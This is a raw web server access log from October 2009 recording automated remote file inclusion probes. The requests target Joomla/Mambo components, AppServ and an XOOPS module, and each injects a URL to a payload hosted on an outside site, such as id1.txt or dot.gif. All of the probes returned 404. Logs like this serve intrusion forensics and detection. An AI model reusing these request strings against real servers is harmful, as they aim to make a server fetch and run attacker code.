125.251.147.194 - - [13/Oct/2009:02:39:52 -0400] "GET /logs/access_log.Q109060400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:02:39:52 -0400] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:02:39:52 -0400] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:02:39:52 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 297 "-" "Mozilla/5.0"
61.199.232.195 - - [13/Oct/2009:02:40:10 -0400] "GET /logs/access_log.Q109062900//components/com_flyspray/startdown.php?file=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
61.199.232.195 - - [13/Oct/2009:02:40:10 -0400] "GET //components/com_flyspray/startdown.php?file=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
61.199.232.195 - - [13/Oct/2009:02:40:11 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
121.78.82.142 - - [13/Oct/2009:02:41:06 -0400] "GET /logs/access_log.Q109051400/?appserv_root=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.78.82.142 - - [13/Oct/2009:02:41:24 -0400] "GET /logs/access_log.Q109092600/?appserv_root=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.199.232.195 - - [13/Oct/2009:02:41:30 -0400] "GET /logs/access_log.Q109071900/index.php?redir=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
61.199.232.195 - - [13/Oct/2009:02:41:39 -0400] "GET /logs/access_log.Q109051100//modules/xfsection/modify.php?dir_module=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
